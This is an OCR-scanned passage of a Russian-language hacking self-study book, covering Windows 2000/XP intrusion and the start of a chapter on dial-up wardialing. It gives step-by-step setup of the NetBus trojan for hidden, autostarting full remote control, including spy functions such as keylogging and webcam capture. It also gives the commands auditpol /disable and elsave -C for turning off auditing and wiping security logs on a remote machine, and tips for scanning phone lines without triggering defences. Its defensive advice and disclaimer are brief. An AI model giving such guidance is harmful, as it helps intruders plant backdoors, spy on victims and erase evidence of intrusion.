Утилиты NetBus и ВО2К позволяют реализовать одну из важнейших целей ха-керской атаки — создание в удаленной системе потайных ходов [3]. Прорвавшисьодин раз в компьютер жертвы, хакер создает в нем множество дополнительных«потайных» ходов. Расчет строится на том, что пока хозяин компьютера ищет инаходит один ход, хакер с помощью пока еще открытых ходов создает новые по-тайные ходы, и так далее. Потайные ходы — крайне неприятная вещь, избавитьсяот них практически невозможно, и с их помощью взломщик получает возмож-ность делать на атакованном компьютере что угодно — следить за деятельностьюпользователя, изменять настройки системы, а также делать ему всякие гадоститипа насильственной перезагрузки системы или форматирования жестких дисков.

В качестве примера троянского коня рассмотрим работу старого, заслуженноготроянского коня NetBus, разработанного группой хакеров cDc (Cult of the DeadCow — Культ мертвой коровы).

168

Page 165: Самоучитель хакера подробное иилюстрированное руководство

Хакинг компьютеров Windows 2000/XP

ПриложениеПриложение NetBus относится к числу клиент-серверных программ, т.е. однаего часть, серверная, устанавливается на атакуемом компьютере, а другая часть,клиентская, на компьютере хакера. Инсталляция приложения, выполняемая налокальном компьютере, не вызывает проблем. В диалоге мастера установки сле-дует указать требуемый компонент — серверный или клиентский, после чегопроисходит его загрузка на компьютер. Скрытая, удаленная, установка серверана атакованном компьютере и запуск серверной програм-мы — это задача посложнее, и мы ее отложим. Вначалерассмотрим работу приложения NetBus на примере двухнаших сетевых компьютеров: клиента — компьютерSword-2000 (ГР-адрес 1.0.0.1), и сервера — компьютерAlex-3 (IP-адрес 1.0.0.5).

Для успешной работы троянского коня NetBus на атакуе-мом компьютере вначале требуется запустить серверныйкомпонент приложения, называемый NBSvr (настоящиехакеры должны ухитриться сделать это удаленно). Призапуске программы NBSvr отображается диалог, пред-ставленный на Рис. 10.7.

1% NB Server [Off] НШЭЕЭ1

|[ Settings i| | Close

HI 1 l>

Л.

/>

Puc. 10.7. Диалогсервера NetBus

Перед использованием сервера NetBus утилиту NBSvr необходимо настроить.Для этого выполните такую процедуру.

>• В диалоге NB Server (Сервер NB) щелкните на кнопке Settings (Параметры).На экране появится диалог Server Setup (Параметры сервера), представлен-ный на Рис. 10.8.

Server setup

НЗ Accept cor

Run on port:|гооз4

Visibility of st

1 Fully visible

Access mod

[Full access

в

Password:

1 \r 1rver: ™

И JsOз:

R0 Autostart every Windows session

0 Log communication

OK Cancel

Puc. 10.8. Диалог настройки сервера NetBus

> Установите флажок Accept connections (Принимать соединения).

169

Page 166: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

> В поле Password (Пароль) введите пароль доступа к серверу NetBus.

> Из открывающегося списка Visibility of server (Видимость сервера) выберитепункт Full visible (Полная видимость), что позволит наблюдать за работойсервера NetBus (но для работы лучше выбрать полную невидимость).

>• В поле Access mode (Режим доступа) выберите Full access (Полный дос-туп), что позволит делать на компьютере Sword-2000 все возможные опера-ции удаленного управления.

>• Установите флажок Autostart every Windows session (Автозагрузка при ка-ждом сеансе работы с Windows), чтобы сервер автоматически загружался привходе в систему.

>• Щелкните мышью на кнопке ОК. Сервер готов к работе.

Теперь настроим работу клиента — утилиту NetBus.exe.

> Запустите утилиту NetBus.exe, после чего отобразится окно NetBus 2.0 Pro,представленное на Рис. 10.9.

Рис. 10.9. Рабочее окно клиента NetBus

Выберите команду меню Host » Neighborhood * Local (Хост * Соседний хост •Локальный). Отобразится диалог Network (Сеть), представленный на Рис. 10.10.

Щелкните на пункте Сеть Microsoft Windows (Microsoft Windows Network) иоткройте список сетевых хостов (Рис. 10.11).

Выберите компьютер с установленным сервером NetBus, в нашем случаеSword-2000, и щелкните на кнопке Add (Добавить). На экране появится диа-лог Add Host (Добавить хост), представленный на Рис. 10.12.

170

Page 167: Самоучитель хакера подробное иилюстрированное руководство

Хакинг компьютеров Windows 2000/XP

Network neighbourhood

Сеть Microsoft Windows

L Add., I [I |Гдо«в_

Network

Network neighbourhood

Add… E Close

Puc. 10.10. Диалог выбора хостадля подключения клиента NetBus

Рис. 10.11. Диалог выбора серверногохоста для подключения

Destination: |Sw6RD-200d

Host name/I P:|1. 0.0.1

TCP-port: | 20034|

U set name: [Administrator

Password: p™ 1

1

1

ft

OK Cancel

Puc. 10.12. Диалог добавления нового хоста — сервера NetBus

В поле Host патеЛР (Имя хоста/IP) введите IP-адрес серверного хоста 1.0.0.1.

В поле User name (Имя пользователя) введите имя взломанной учетной запи-си Administrator, а в поле Password (Пароль) — дешифрованный утилитойLC4 пароль 007.

Щелкните на кнопке ОК. На экране отобразится диалог Network (Сеть).

Закройте диалог Network (Сеть), щелкнув на кнопке Close (Закрыть).На экране отобразится окно NetBus 2.0 Pro с записью добавленного хоста(Рис. 10.13).

Чтобы подсоединиться к хосту Sword-2000, щелкните правой кнопкой мышина пункте списка Sword-2000 и из отобразившегося контекстного меню вы-берите команду Connect (Подсоединить). В случае успеха в строке состоянияокна NetBus 2.0 Pro отобразится сообщение Connected to 1.0.0.1 (v.2.0)(Подключен к 1.0.0.1 (v.2.0)).

171

Page 168: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

KNetBus 2.0 Pro

Destination I Host

ysworaxzcggjЭ My computer

Cannot connect to 127.0.0.1

Puc. 10.13. Окно NetBus 2.0 Pro с записью добавленного хоста — сервера NetBus

После успешного соединения с серверным компонентом NetBus хакер, исполь-зуя инструменты клиента NetBus, может сделать с атакованным компьютеромвсе что угодно. Практически ему будут доступны те же возможности, что и улокального пользователя Administrator. На Рис. 10.14 представлен список инст-рументов клиента NetBus, отображенный в меню Control (Управление).

ISWORIMy con

Cannot conne

Message managei

DesUnatiorldJ File manager

Я Window managei

•$r Registry manager

S£i Sound system

^J Plugin managei

Ф Port redirect

(f* Application redirect

Remote control

[f^-j File actions

V Spy functions

О Enil Windows

0.0.1

‘7.0.0.1

Puc. 10.14. Меню Control содержит обширный списокинструментов управления удаленным хостом

Среди этих инструментов отметим средства, собранные в подменю Spy functions(Средства шпионажа) и содержащие такие полезные инструменты, как клавиа-турный шпион, перехватчики экранных изображений и информации, получае-мой с видеокамеры, а также средства записи звуков. Таким образом, проникшийв ваш компьютер хакер может подглядывать, подслушивать и прочитывать все,что вы видите, говорите или вводите с клавиатуры компьютера. И это еще не

172

Page 169: Самоучитель хакера подробное иилюстрированное руководство

Хакинг компьютеров Windows 2000/XP

все! Хакер может модифицировать системный реестр компьютера Sword-2000,запускать любые приложения и перезагружать удаленную систему Windows, неговоря уж о возможностях просмотра и копирования любых документов и файлов.

Как уже упоминалось, описанная в этом разделе утилита сервера NetBus, так жекак и описанный в предыдущем разделе клавиатурный шпион IKS, требуютпредварительного запуска на атакуемом компьютере. Последняя задача состав-ляет целую отдельную область хакинга и заключается в поиске открытых по не-досмотру каталогов информационного сервера IIS (см. Главу 8), а также в ис-пользовании методов «социальной инженерии», применяемых для внедренияв компьютер троянских коней или вирусов. (Подробнее методы «социальнойинженерии» рассматриваются на протяжении всей книги).

Сокрытие следовАудит, несомненно, является одним из наиболее серьезных средств защиты отхакинга компьютерной системы, и отключение средств аудита — одна из первыхопераций, которую выполняют хакеры при взломе компьютерной системы.Для этого применяются различные утилиты, позволяющие очистить журнал ре-гистрации и/или отключить аудит системы перед началом «работы».

Для отключения аудита хакеры могут открыть консоль ММС и отключить поли-тику аудита, воспользовавшись средствами операционной системы. Другим,более мощным средством, является утилита auditpol.exe комплекта инструмен-тов W2RK. С ее помощью можно отключать (и включать) аудит как локального,так и удаленного компьютера. Для этого следует из командной строки ввеститакую команду.

C:\Auditpol>auditpol \\sword-2000 /disable

На экране появятся результаты работы:

Running-Audit information changed successfully on \\sword-2000…New audit policy on \\sword-2000…(0) Audit Disabled

System = NoLogon = NoObject Access = NoPrivilege Use = NoProcess Tracking = Success and FailurePolicy Change = NoAccount Management = NoDirectory Service Access = NoAccount Logon = No

173

Page 170: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Параметр команды \\sword-2000 — это имя удаленного компьютера, а ключ /disableзадает отключение аудита на этом компьютере. Утилита auditpol.exe — весьмаэффективное средство, созданное для управления сетевыми ресурсами, нотакже, как видим, весьма удобный инструмент хакинга. Чтобы познакомиться сее возможностями, достаточно ввести команду auditpol /?, после чего на экранеотобразится справочная информация по применению утилиты. В частности, этаутилита позволяет включать/отключать аудит базы данных SAM, что являетсяпредпосылкой использования утилиты pwdump3.exe для извлечения паролей избазы SAM.

Очистку журналов безопасности можно выполнить либо с помощью утилитыпросмотра журналов Windows 2000/XP, либо с помощью специальных утилит(как правило, используемых хакерами). В первом случае следует выполнитьследующие действия.

>• Щелкните на кнопке Пуск (Start) и в появившемся главном меню выберитекоманду Настройка «Панель управления (Settings * Control Panel).

> В отобразившейся панели управления откройте папку Администрирование(Administrative Tools).

> Дважды щелкните на аплете Управление компьютером (Computer Manage-ment). На экране появится диалог консоли ММС.

> Последовательно откройте папки Служебные программы # Просмотр со-бытий (System Tools * Event Viewer).

>• Щелкните правой кнопкой мыши на пункте Безопасность (Security Log);появится контекстное меню.

>• Выберите команду контекстного меню Стереть все события (Clear allEvents). На экране появится диалог Просмотр событий (Event Viewer) спредложением сохранить журнальные события в файле.

> Щелкните на кнопке Нет (No), если вам больше не требуются зафиксирован-ные в журнале события. Журнал будет очищен.

При выполнении операции очистки журнала безопасности обратите на характер-ную особенность. При очистке журнала безопасности из него удаляются все со-бытия, но сразу устанавливается новое событие — только что выполненная очисткажурнала аудита! Таким образом, хакер все же оставит свой след — пустой журналс зафиксированным событием очистки журнала. Посмотрим, не помогут ли нам втаком случае хакерские утилиты.

Попробуем применить рекомендованную в [3] утилиту очистки журнала собы-тий elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). Эта утилитапредназначена в первую очередь для очистки журналов Windows NT 4, но ее по-

174

Page 171: Самоучитель хакера подробное иилюстрированное руководство

Хакинг компьютеров Windows 2000/XP

следняя версия работает и с системой Windows 2000. Вот как она запускается изкомандной строки.

C:\els004>elsave -s \\sword-2000 -С

Здесь ключ -s задает режим удаленной очистки, а ключ -С задает операциюочистки журнала. Кроме очистки, утилита позволяет копировать события жур-нала в файл. (Ввод команды elsave /? приводит к отображению справки, и выможете сами испытать эффективность всех предлагаемых возможностей).Проверка показывает, что отмеченный выше недостаток остался — применениеутилиты elsave.exe регистрируется в журнале безопасности как событие очисткижурнала, подобно применению команды очистки журнала средствами аплетаУправление компьютером (Computer Management).

Как защититься от всех этих утилит? Следует убрать из компьютера (или замас-кировать) все утилиты комплекта W2RK, установить аудит базы данных SAM,системного реестра и всех важных ресурсов системы. После этого следует регу-лярно просматривать журнал безопасности. Выявление непонятных событийочистки журнала безопасности или доступа к защищенным ресурсам поможетнавести на след хакера.

ЗаключениеСетевой хакинг компьютеров — это очень распространенное занятие хакеров.Однако, как мы видим, занятие это весьма трудоемкое, и при желании выявитьтакого рода манипуляции достаточно просто. Для этого достаточно воспользо-ваться шаблонами безопасности Windows и загрузить шаблон защиты сервера(как это сделать, можно узнать, например, в [7]). Другие меры пассивной оборо-ны состоят в настройке системы защиты Windows, брандмауэров и систем IDS.В особых случаях антихакер может также прибегнуть к выявлению хакера егоже методами, поскольку системы IDS, как правило, способны выявлять IP-адреснарушителя (например, это делает программа BlacklCE Defender). Однако анти-хакеру следует учесть, что проникая в компьютер хакера, он сам уподобляетсяпротивнику, так что нелишней мерой будет использование прокси-серверов идругих средств маскировки..

175

Page 172: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 11.

Хакинг коммутируемого доступаТелефонные линии связи, подключенные к корпоративной сети, по сути пред-ставляют собой наилучший способ вторжения в компьютерную систему органи-зации. В самом деле, на входах в подключенный к Интернету сервер ныне, какправило, стоят брандмауэры (ведь все уже достаточно наслушались ужасов проэтих самых хакеров, орудующих в Интернете), физический доступ к компьюте-рам — это, знаете ли, на любителя. А вот телефонные линии, неведомо как и кемподключенные к компьютерам с помощью модемов — это реалии нынешней жизни.Очень многие сотрудники организаций тайком от всех подключают к своим офис-ным компьютерам модемы для организации входов со своих домашних компьюте-ров — с самыми разными целями, например, бесплатного доступа к Интернету.

После такого деяния вся система защиты компьютерной системы фактическиобнуляется, поскольку все эти ламеры чаще всего думают, что раз они об этомподключении никому не скажут, то никто ничего и не узнает — а раз так, то осистеме защиты такого подключения никто и не думает. «Ха-ха-ха» — скажет имв ответ бывалый «кул хацкер» — ведь у нас же есть такие вещи, как сканеры те-лефонных номеров! В самом деле, ведь нет ничего проще, чем определение те-лефонной линии с работающим на том конце модемом — набрав соответствую-щий номер, можно услышать характерные звуки, издаваемые модемом на дру-гом конце линии связи.

Эти звуки есть не что иное, как сигналы, посредством которых модемы связы-ваются друг с другом. Зная протокол взаимодействия модемов, частоты, после-довательности и длительности сигналов — для специалистов секретов тут нет -можно написать программу, автоматизирующую процесс поиска модемных ли-ний связи, способную перебирать наборы телефонных номеров из заданногодиапазона, выявлять встреченные модемные линии связи и записывать получае-мые сообщения в специальный журнал.

Таких программ-сканеров создано множество, самые известные из них — этоутилита Login Hacker, позволяющая применять для задач сканирования сцена-рии, утилита THN-Scan (http://www.infowar.co.uk/thc/) и ToneLock компанииMinor Threat&Mucho Maas. Две последние утилиты запускаются из команднойстроки и не имеют графического интерфейса, представляя собой по сути релик-ты древней системы DOS, которые на современных операционных системахтолком не работают.

Однако ныне появилась суперпрограмма, способная решить все (или почтивсе) задачи сканирования телефонных номеров — утилита PhoneSweep(http://www.sandstorm.com) компании Sandstorm. Эта утилита позволяет скани-ровать сразу несколько телефонных линий, работая с несколькими модемамиодновременно, выявлять удаленную программу, принимающую телефонные

Page 173: Самоучитель хакера подробное иилюстрированное руководство

Хакинг коммутируемого доступа

звонки, и даже подбирать пароль для доступа к этой самой удаленной програм-ме. В этой главе мы опишем возможности утилиты PhoneSweep, опираясь насправку демо-версии программы, предоставляемую на сайте компании Sandstorm.Эта демо-версия программы PhoneSweep позволяет делать почти все, кроме ис-полнения реальных звонков, заменяя их имитацией.

Однако перед тем, как перейти к описанию PhoneSweep, мы обсудим одну ма-ленькую, но, тем не менее, очень важную тему — откуда же эти хакеры берут те-лефонные номера, чтобы приступить к хакингу линий связи. Ведь ясно, что пол-ный перебор всех, каких только можно вообразить, телефонных номеров, какправило, семизначных, практически невозможен, поскольку займет слишкоммного времени. Поэтому первая задача хакера — определить, хотя бы приблизи-тельно, диапазон номеров организации, компьютерную систему которой хакеримеет честь атаковать.

Источники номеров телефонов

И вот туг-то нам следует вспомнить все то, что говорилось в первых главах кни-ги об этапах хакинга компьютерной системы. Перед исполнением атаки квали-фицированный хакер всегда выполняет предварительный сбор данных об орга-низации, который заключается в поиске всех сведений, которые хакер можетсобрать об атакуемой компьютерной системе. Имеется в виду информация, со-держащая сведения о компьютерной сети атакуемой организации. Эта информа-ция содержится в базе данных Whols уполномоченного поставщика имен Ин-тернета (например, на http://www.ripe.net). Базы данных Whols обязаны содер-жать сведения об администраторах зарегистрированной в Интернете сети, вклю-чая имя, телефон, адрес электронной почты и местонахождение администратора -и все это — зацепка для начала поисков дыры в заборе вокруг лакомой компью-терной системы.

Для самых нетерпеливых хакеров укажем еще один путь получения списка ин-тересных телефонных номеров — на хакерских сайтах и компакт-дисках можнонайти файлы с результатами сканирования широкого диапазона телефонных но-меров. В этих файлах можно найти множество сведений о телефонах различныхорганизаций с указанием программы, принимающей звонки, и даже сведений опаролях доступа.

Здесь мы не будем обсуждать такую интересную тему, как поиск материальныхисточников информации на свалках вокруг организации, компьютерную систе-му которой требуется взломать. Оказывается, и в это можно поверить, что натаких свалках можно найти все — выброшенные документы любого содержания,дискеты с ценнейшей информацией, и тому подобное. Но все это мы оставляемдля самостоятельного изучения — в Интернете полным-полно руководств для

177

Page 174: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

подобного рода деятельности, включающих советы даже по таким важным те-мам, как способы чтения испорченных дискет, правила поведения на свалках ивыбор наилучшей одежды для лазания по мусорным ящикам.

Автор категорически протестует против применения изложен-ных далее сведений для попыток взлома доступа к компьютернымресурсам различных организаций, поскольку это — явное наруше-ние законов и этических норм человеческого сообщества. В част-ности, телефонный сканер PhoneSweep создан сугубо для целейтестирования защищенности модемных линий связи, но отнюдьне для хакерских попыток взлома доступа к подключенному к линиисвязи компьютеру (например, серверу провайдера Интернета).

Сканер fhoneSweep Йг.ЧгУтилита PhoneSweep — по сути, первый по настоящему функциональный инст-румент для анализа систем защиты телефонных линий. Применяемые до сих порпрограммные инструменты были сложны в управлении, созданы программиста-ми-любителями и лишены сколь либо значимой поддержки производителя.Самый же главный их недостаток — это плохая совместимость с современнымисистемами Windows.

Программа PhoneSweep лишена этих недостатков и предлагает всем пользова-телям мощные средства тестирования модемных линий на предмет их защищен-ности от несанкционированного доступа. Программа PhoneSweep обладает та-кими замечательными возможностями.

• Работает на операционных системах Windows 95/98/NT/2000/XP.

• Снабжена удобным графическим интерфейсом.

• Позволяет тестировать системы защиты на устойчивость к атакам «грубойсилой» с генерацией пар логин/пароль для взлома соединений по протоколуРРР (Point-to-Point protocol — Протокол двухточечного соединения).

• Позволяет создавать настраиваемые отчеты.

• Позволяет работать с несколькими модемами, от 1 до 4.

• Позволяет останавливать и перезапускать сканирование с различными на-стройками, причем без всякой потери полученных данных.

Обсудим графический интерфейс программы PhoneSweep.

178

Page 175: Самоучитель хакера подробное иилюстрированное руководство

Хакинг коммутируемого доступа

Диалог fttoneSweepПосле запуска программы PhoneSweep Demo на экране появляется диалог с со-общением о том, что запущенная программа представляет собой демо-версию.

После щелчка на кнопке ОК отображается диалог выбора профиля пользова-теля (Рис. 11.1).

This is a demonstration version of SandstormEnterprises’ PhoneSweep ™telephonescanning application. The demonstration versionwill NOT actually test computer system securivon telephone networks. It may be used anddistributed freely, provided that neither theprogram nor its components are modified, andthat Sandstorm’s copyright remains intact.

End User License Agreement

Sandstorm Enterprises Inc. («Sandstorm») and/orits suppliers own these programs and theirdocumentation, which are protected underapplicable copyright laws. Your right to use theprograms and the documentation is limited to theterms and conditions described below.

1. Licens e: YOU MAY: (a) use the enclosedprograms one single computer; (to) physicallytransfer the programs from one computer toanother; (c) make a copy of the programs for

| [Accept | | I Decline | | Copy to Clipboard |

i- Load Profile _ —^ ^ ^ —

I О New © Current О Select From List

Puc. 11.1. Диалог выбора профиля пользователя PhoneSweep

> При первом запуске доступен только профиль Default (По умолчанию),поэтому оставьте выбранный по умолчанию переключатель Current (Теку-щий) и щелкните на кнопке I Accept (Я согласен). На экране появится рабо-чее окно программы PhoneSweep 4.4 Demo, представленное на Рис. 11.2.

В верней части окна PhoneSweep 4.4 Demo находится строка со стандартнымименю File (Файл), View (Вид) и Help (Справка). Под строкой меню можно заме-тить горизонтальную панель инструментов, предназначенную для управлениясканированием и настройкой работы системы. Под панелью инструментов нахо-дится пустая полоса линейного индикатора, на которой отображается ход про-цесса сканирования с указанием процента от общего объема выполненной работы.

В центральной части окна PhoneSweep 4.4 Demo расположены вкладкиPhoneNumbers (Номера телефонов), Results (Результаты), Status (Состояние),History (Журнал) и Setup (Параметры). Щелчки мышью на ярлыках этих вкла-док приводят к отображению подчиненных вкладок, отображающих информа-цию по управлению сканированием телефонных номеров.

179

Page 176: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

rnlhost — DEFAULT MMolFile View Help

>. • ruStart Stop [Rescanj

В 6* #Save Rsvert Default Import Export Report Graph Dist

Ik?4%

Ehone Numbers [ Besulls |j Status | History | Setup

Prefix V | Number%555-00

5Status I History I £

Д [A | Time | r, [Result |-Q»f System ID |l

Add

a

PMC. 11.2. Рабочее окно программы PhoneSweep содержит все инструментыдля сканирования

В правой части окна PhoneSweep 4.4 Demo расположена вертикальная панельинструментов. Набор кнопок на этой панели зависит от выбранной вкладки ипредназначен для дополнения возможностей вкладок отдельными средствами(см. раздел «Вертикальная панель инструментов» ниже).

В нижней части окна PhoneSweep 4.4 Demo находится строка состояния, в ко-торой отображаются сообщения о ходе текущей операции. Справа в строке со-стояния отображается несколько значков, показывающих текущий режим рабо-ты программы. Эти значки позволяют определить, находится ли PhoneSweep в ре-жиме сканирования, содержит ли текущий профиль запланированное время запускаи/или остановки, доступен или нет текущий телефонный номер, каков режим тести-рования этого номера, состояние генерирования отчетов, текущее время.

Обсудим инструменты, предоставляемые PhoneSweep на указанных выше пане-лях инструментов и вкладках.

верхняя Горизонтальная панель инструментовНа верхней горизонтальной панели инструментов сосредоточены средства, по-зволяющие выполнять следующие основные операции (перечисление в порядкеслева направо).

• Start (Пуск). Щелчок на этой кнопке запускает сканирование; если щелк-нуть и удерживать нажатой кнопку Start (Пуск), то отобразится меню,

180

Page 177: Самоучитель хакера подробное иилюстрированное руководство

Хакинг коммутируемого доступа

представленное на Рис. 11.3, которое позволяет запланировать запуск и за-вершение процесса сканирования в текущем профиле пользователя. Заме-тим, что в профиле Default не указан применяемый при сканировании модем,так что вначале вам отобразится диалог с предложением выбрать модем навкладке Setup (Параметры).

|t*51 PhoneSweep 4 4 Demo — localhost — DEFAULT

file View Help

Start Stop ResconВ 6* *

Seve Revert Default

> Start Now

£J Schedule Start…

R? Cancel Scheduled Start

History Setup

Щ Schedule Stop…

В Cancel Scheduled Slop

& А Ш ФImport Export Report Graph Dist Whet’s this?

me [Modem [Result j-U»| System ID j i

nra -BFF- ra -CFF- ШЕШШВ?

Рис. 11.3. Планирование запуска сканирования

• Stop (Стоп). Щелчок на этой кнопке остановит сканирование. Если щелкнутьна кнопке Stop (Стоп) и удерживать нажатой кнопку мыши, то отобразитсяменю для планирования остановки сканирования и сохранения настроек в те-кущем профиле.

• Rescan (Повторное сканирование). Щелчок на этой кнопке позволяет создатьновый профиль в виде клона текущего профиля, без потери предыстории вы-полненных телефонных звонков. Имя нового профиля задается в диалогеPhoneSweep Demo — New Profile (PhoneSweep Demo — Новый профиль),представленном на Рис. 11.4.

t

IOEFAULT 1

| OK || Cancel |

PMC. 77.4. Диалог для задания имени клона текущего профиля

• Save (Сохранить). Сохранение изменений в текущем профиле, включая всетекущие изменения.

181

Page 178: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

• Revert (Вернуть). Возврат к последним сохраненным установкам, включаяпараметры, установленные во всех подчиненных вкладках.

• Default (По умолчанию). Переустановка всех переменных во всех подчинен-ных вкладках в устанавливаемые по умолчанию значения.

• Import (Импорт). Импортирование в текущий открытый профиль телефонныхномеров или списка логинов/паролей из файла bruteforce.txt.

• Export (Экспорт). Экспортирование результатов звонков (всех или выбран-ных по результатам сканирования), телефонных номеров или списков именпользователей с паролями.

• Report (Отчет). Генерирование стандартных отчетов, основанных на инфор-мации в текущем профиле, или отчетов на основе результатов двух отдель-ных профилей сканирования.

• Graph (График). Генерирование секторной диаграммы на основе информациив текущем профиле (требуется программа Excel 2000).

• What’s This? (Что это такое). Щелкните на этом значке, а затем на элементеуправления в окне PhoneSweep 4.4 Demo — и вам отобразится экранная под-сказка о назначении этого средства.

вертикальная панель инструментовВертикальная панель инструментов в правой части окна PhoneSweep 4.4 Demoотображает набор значков в зависимости от выбранной вкладки и подчиненныхвкладок (Рис. 11.5) и может значительно варьироваться от вкладки к вкладке,вплоть до полного их отсутствия.

Как видим, содержимое вертикальной панели инструментов для вкладки Profiles(Профили), подчиненной вкладке Setup (Параметры), сильно отличается от со-держимого вертикальной панели инструментов на Рис. 11.3.

• Open (Открыть). Открывает существующие профили. Кнопка реализованадля^подчиненной вкладки Profiles (Профили) и представлена на Рис. 11.5.

• New profile (Создать профиль). Создание нового профиля. Кнопка реализова-на для подчиненной вкладки Profiles (Профили) и представлена на Рис. 11.5.

• Copy profile (Копировать профиль). Подсказывает пользователю имя новогопрофиля и копирует в него содержимое текущего профиля (исключает пре-дысторию звонков и устанавливает все параметры в значение по умолчанию).Кнопка реализована для подчиненной вкладки Profiles (Профили) и пред-ставлена на Рис. 11.5.

182

Page 179: Самоучитель хакера подробное иилюстрированное руководство

Хакинг коммутируемого доступа

ЯРЮ

File View Help

>. • «Start Stop Rescan Save Rawert Default

a ± в аImport Export Report Graph Disi

n?What’s this?

Ehone Numbers | Besults | Status | History | Setup

«йт5ё™11″5Й18™|K ‘This is a demonstration profile for PhoneSweep

4 0 Demo.Click in this box to edit this note.or dick on «New» to create a new profile.

Open

ВNew

ECopy

Delete

Puc. 11.5. Содержимое вертикальной панели инструментовдля вкладки Profiles (Профили)

• Delete (Удалить). Удаляет выбранный во вкладке профиль и всю ассоцииро-ванную с ним информацию. Кнопка реализована для подчиненной вкладкиProfiles (Профили) и представлена на Рис. 11.5.

• Save (Сохранить). Сохраняет изменения, сделанные в окне с замечаниями кпрофилям, отображаемым в панели справа от списка профилей. Кнопка реа-лизована для подчиненной вкладки Profiles (Профили) и представленана Рис. 11.5.

• Undo (Отменить). Отменяет изменения в замечаниях к профилю. Кнопка реа-лизована для подчиненной вкладки Profiles (Профили) и представленана Рис. 11.5.

• Freeze (Заморозить). Останавливает воспроизведение на вкладке History(Предыстория) хода текущего сканирования в реальном масштабе времени.После щелчка кнопка Freeze (Заморозить) заменяется кнопкой Thaw (Размо-розить). Кнопка Freeze (заморозить) реализована для подчиненной вкладкиHistory (Предыстория) и представлена на Рис. 11.6.

• Thaw (Разморозить). Возобновляет отображение хода сканирования в реаль-ном масштабе времени на вкладке History (Предыстория). Кнопка реализованадля подчиненной вкладки History (Предыстория) и представлена на Рис. 11.6.

• Clear (Очистить). Очищает содержимое вкладки. Кнопка реализована для под-чиненной вкладки History (Предыстория) и вкладки Phone Numbers (Номерателефонов) и представлена на Рис. 11.6.

183

Page 180: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

File View Help

II

Start Stop Rescen Save Revert Default Import Export Report Graph

2003-03-2011:16

Phone Numbers [| Results | Status [ History [Setup

200M3-2PJJJ4720бЗ-03:2011:47″

[Modem [Number [Result

?BM003_»555-2004 ‘

|-a»|SystemlD | User ID

NO,FACSIMILE______

IIFreeze

aClear

[idle

Puc. 11.6. Вкладка History (Предыстория)ассоциирована со своей вертикальной панелью инструментов

• Add (Добавить). Добавляет телефонный номер или диапазон номеров в теку-щий профиль. Кнопка реализована для вкладки Phone Numbers (Номера те-лефонов) и представлена на Рис. 11.3. Кнопки Clear (Очистить) и Add (Доба-вить) содержатся также в диалоге Add Phone Numbers (Добавить номера те-лефона), представленном на Рис. 11.7 и отображаемом при щелчке на кнопкеAdd (Добавить).

Hphonesweep 4 4 Demo — Add Р… МЦПЁЗ]

From: |

То:

Note:

Е! Business П Outside

О Each Time Period <•)

П Weekend | All |

Any Time Period

1 ОЙ

*

Г51

Рис. 11.7. Добавление номера телефона для сканирования

• Delete (Удалить). Удаляет номер телефона или диапазон номеров из текущегопрофиля.

• Add/Save (Добавить/Сохранить). Добавляет и сохраняет телефонный номер илидиапазон номеров, введенный в диалоге Add Phone Numbers (Добавить теле-фонные номера).

184

Page 181: Самоучитель хакера подробное иилюстрированное руководство

Хакинг коммутируемого доступа

Значки Ъ строке состоянияВ строке состояния внизу рабочего окна программы PhoneSweep отображаетсясостояние программы. В процессе работы в левой части строки состояния ото-бражаются различные информационные сообщения, а значки в правой частистроки состояния меняют свой вид. Смысл сообщений достаточно прозрачен,так же как и назначение значков, так что просто перечислим значки в порядкеслева направо.

• Sweeping Indicator (Индикатор сканирования) — показывает, находится липроцесс сканирования в простое или активирован.

• Scheduled Start On/Off (Плановый старт включен/выключен) — показывает,запланирован или нет запуск сканирования (если нет, значок перечеркнуткрасной линией).

• Scheduled Start Time (Плановое время старта) — отображает запланирован-ное время старта или OFF.

• Scheduled Stop On/Off (Плановый останов включен/выключен) — показывает,запланирован или нет останов сканирования (если нет, значок перечеркнуткрасной линией).

• Scheduled Stop Time (Плановое время останова) — отображает запланиро-ванное время останова сканирования или OFF.

• Effort level (Режим сканирования) — фиксирует режим сканирования — долж-на ли программа выполнять только подключение, или идентифицировать це-левую систему, или пытаться взломать защиту целевой системы.

• Phonenumbers to Dial (Телефонные номера для прозвона) — указывает, оста-лись или нет телефонные номера для прозвона. Если нет, индикатор стано-вится красным.

• Report Status (Состояние отчета) — показывает, создается в данный моментотчет, или нет; если да — индикатор анимирован и имеет зеленый цвет; еслинет — индикатор белый.

• Time Period (Период времени) — отображает текущий период времени — ра-бочее время, нерабочее время, выходные дни.

• Remote Access Indicator (Индикатор удаленного доступа) — указывает, дос-тупна ли в данный момент времени программа PhoneSweep для удаленногоуправления. Если да, то индикатор имеет красный цвет.

Теперь мы более-менее знакомы с содержимым рабочего окна программыPhoneSweep и готовы узнать, как с ее помощью можно достичь желанной цели -доступа к удаленной компьютерной системе.

185

Page 182: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

fadoma с программой flioneSweepЧтобы начать сканирование телефонных номеров с помощью программы Phone-Sweep, следует сделать три простые операции.

> В рабочем окне программы PhoneSweep открыть вкладку Setup (Парамет-ры), представленную на Рис. 11.5 и настроить текущий профиль программы.

>• Открыть вкладку Phone Numbers (Телефонные номера), представленную наРис. 11.2, и, щелкнув на кнопке Add (Добавить), в отобразившемся диалоге AddPhone Numbers (Добавить номера телефона), представленном на Рис. 11.7,ввести диапазон телефонных номеров для прозвона.

>• В рабочем окне программы PhoneSweep щелкнуть на кнопке Start (Старт) иподождать результатов.

Ясно, что основной процедурой здесь является настройка профиля программы,которая в терминах справочной системы программы называется созданием пра-вил прозвона (dialing riles).

Правила проз&оиаПравила прозвона программы PhoneSweep позволяют управлять порядком, вре-менем и частотой звонков, выполняемых в процессе сканирования телефонныхномеров организации. При создании правил прозвона следует добиться такогоповедения программы PhoneSweep, которое, с одной стороны, не привлечет из-лишнего внимания системы защиты линий связи, а с другой — позволит решитьпоставленную задачу с минимальными усилиями.

Обсудим возможности, предоставляемые программой PhoneSweep для созданияправил прозвона.

Порядок и время

